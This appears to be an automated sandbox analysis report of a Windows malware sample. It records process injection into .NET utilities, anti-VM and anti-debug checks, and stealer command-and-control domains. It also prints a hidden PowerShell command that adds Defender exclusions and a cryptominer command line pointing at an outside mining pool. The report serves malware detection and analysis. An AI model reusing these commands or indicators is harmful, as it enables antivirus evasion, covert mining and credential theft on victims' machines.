Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59650
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59531
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59419
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59312
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1199125
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1199015
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1198906
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1198797
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1198687
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1198571
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1198451
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1198330
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1198161
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59943
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59665
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59547
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59438
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59313
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1197172
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59875
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59765
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59656
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59422
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59871
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59761
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59641
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59532
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59418
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59298
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59442
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\l6E.exe	Thread delayed: delay time: 922337203685477

Source: AddInProcess.exe, 0000000F.00000002.4611056195.000002DFC8066000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: HPd7I3vQri.exe, 00000004.00000002.4713428086.0000000005687000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y*
Source: HPd7I3vQri.exe, 00000004.00000002.4713428086.0000000005687000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\2
Source: HPd7I3vQri.exe, 00000004.00000002.4713428086.0000000005693000.00000004.00000020.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4705514585.00000000055A0000.00000004.00000020.00020000.00000000.sdmp, AddInProcess.exe, 0000000F.00000002.4611056195.000002DFC8066000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2787828639.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2787828639.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: HPd7I3vQri.exe, 00000004.00000002.4710959373.0000000005655000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: RegAsm.exe, 00000018.00000002.2787828639.0000000000F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\cfM
Source: HPd7I3vQri.exe, 00000004.00000002.4713428086.0000000005687000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWigabit Network Connection

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 24_2_00439340 LdrInitializeThunk,

24_2_00439340

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_00407B01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041914C mov eax, dword ptr fs:[00000030h]		3_2_0041914C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004114A6 mov ecx, dword ptr fs:[00000030h]		3_2_004114A6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041EFD8 GetProcessHeap,

3_2_0041EFD8

Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00407B01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00407C63 SetUnhandledExceptionFilter,	3_2_00407C63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00407D75 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00407D75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040DD78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0040DD78

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Bypasses PowerShell execution policy

Source: unknown

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe

Code function: 0_2_0270216D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_0270216D

Encrypted powershell cmdline option found

Source: unknown

Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\engineer\AppData\Roaming\ArgumentCount\Current.exe,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe,C:\Users\engineer\AppData\Local\Temp\ -Force; Add-MpPreference -ExclusionProcess C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe,C:\Users\engineer\AppData\Roaming\ArgumentCount\Current.exe

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: l6E.exe, 00000016.00000002.2747490212.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tryyudjasudqo.shop
Source: l6E.exe, 00000016.00000002.2747490212.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: eemmbryequo.shop
Source: l6E.exe, 00000016.00000002.2747490212.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: reggwardssdqw.shop
Source: l6E.exe, 00000016.00000002.2747490212.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: relaxatinownio.shop
Source: l6E.exe, 00000016.00000002.2747490212.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tesecuuweqo.shop
Source: l6E.exe, 00000016.00000002.2747490212.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tendencctywop.shop
Source: l6E.exe, 00000016.00000002.2747490212.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: licenseodqwmqn.shop
Source: l6E.exe, 00000016.00000002.2747490212.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: keennylrwmqlw.shop

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Thread register set: target process: 3512
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread register set: target process: 6116
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread register set: target process: 5320

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 434000	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 436000	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 53F000	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: CF2008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 400000
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 402000
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 4B4000
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: B8256F7010
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 36F9DD2010
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: E1396D1010
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 445000
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 448000
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 458000
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 95C008

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe "C:\Users\user\AppData\Roaming\HPd7I3vQri.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe "C:\Users\user\AppData\Roaming\yTRfYxWiym.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CfpeAm3lJAky.bat" "	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\l6E.exe "C:\Users\user\AppData\Roaming\l6E.exe"
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4800 -ip 4800
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1780

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcaguabgbnagkabgblaguacgbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwaqqbyagcadqbtaguabgb0aemabwb1ag4adabcaemadqbyahiazqbuahqalgblahgazqasaemaogbcafcaaqbuagqabwb3ahmaxabnagkaywbyag8acwbvagyadaauae4arqbuafwargbyageabqblahcabwbyagsanga0afwadga0ac4amaauadmamaazadeaoqbcaeeazabkaekabgbqahiabwbjaguacwbzac4azqb4agualabdadoaxabvahmazqbyahmaxablag4azwbpag4azqblahiaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acabcacaalqbgag8acgbjaguaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabxagkabgbkag8adwbzafwatqbpagmacgbvahmabwbmahqalgboaeuavabcaeyacgbhag0azqb3ag8acgbradyanabcahyanaauadaalgazadaamwaxadkaxabbagqazabjag4auabyag8aywblahmacwauaguaeablacwaqwa6afwavqbzaguacgbzafwazqbuagcaaqbuaguazqbyafwaqqbwahaarabhahqayqbcafiabwbhag0aaqbuagcaxabbahiazwb1ag0azqbuahqaqwbvahuabgb0afwaqwb1ahiacgblag4adaauaguaeablaa==

Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerH
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4714740316.0000000005AC2000.00000004.00000020.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager4"
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerT
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002EA4000.00000004.00000800.00020000.00000000.sdmp, HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\
Source: HPd7I3vQri.exe, 00000004.00000002.4623115948.0000000002E59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager\|

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004077E0 cpuid

3_2_004077E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_0041E825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	3_2_00414138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	3_2_0041EA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0041EBA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	3_2_0041E412
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	3_2_0041ECA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_0041ED76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	3_2_0041465E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	3_2_0041E60D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	3_2_0041E6FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	3_2_0041E6B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	3_2_0041E79A

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Queries volume information: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Queries volume information: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Queries volume information: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
